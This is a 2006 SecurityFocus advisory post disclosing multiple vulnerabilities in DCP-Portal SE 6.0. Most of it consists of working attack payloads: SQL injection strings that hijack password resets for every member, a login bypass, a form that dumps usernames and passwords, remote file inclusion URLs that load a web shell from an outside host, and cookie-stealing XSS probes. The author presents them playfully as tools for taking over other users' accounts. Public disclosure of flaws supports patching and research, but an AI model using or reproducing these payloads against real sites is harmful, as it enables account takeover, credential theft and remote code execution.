DCP-Portal SE 6.0 multiple injections Sep 14 2006 11:39AM
security soqor net
Hello,,

DCP-Portal SE 6.0 multiple injections

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

sql injections

if magic_qoutes_gpc = off

/*************************************/

lostpassword.php

you can recive the reset password email on your email for any user you want :)

change youremail (at) yourserver (dot) com [email concealed] to your real email

example :

-1' union select uid ,sex,name,surname,'youremail (at) yourserver (dot) com [email concealed]',birthdate,address,zip,city,
country,job,tel,language,hideinfo,list,username,password,signature,admin
,active,date from dcp5_members/*

and you will recive email reset password for all the members in this website

and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid

-1' union select uid ,sex,name,surname,'youremail (at) yourserver (dot) com [email concealed]',birthdate,address,zip,city,
country,job,tel,language,hideinfo,list,username,password,signature,admin
,active,date from dcp5_members where uid=1/*

---------------------------

login

try the user name as

' or uid=1/*

or change the uid value for any username you want log with

---------------------------

file calendar.php

Sql injection by post method ,, try this form :)

<form name="hack" action="calendar.php" method=post>

<input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1">

<input type=submit>

</form>

---------------------------

file search.php

try one of these ,, bcause the number of columns changes from section to another :)

if you searched for (content,news,link,forum)

use

xx%') union select uid,username,password from dcp5_members/*

if you searched for (doc,anns)

use

xx%') union select uid,username,password,password from dcp5_members/*

/*************************************/

Remote File including

library/lib.php?root=http://www.soqor.net/tools/cmd.txt?

library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?

/*************************************/

Fill path

library/editor/editor.php

library/lib.php

/*************************************/

Xss

admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</scr
ipt><"

admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</sc
ript>

admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</scr
ipt><"

admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</
script>

admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</scri
pt>

admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</s
cript>

/*************************************/

WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus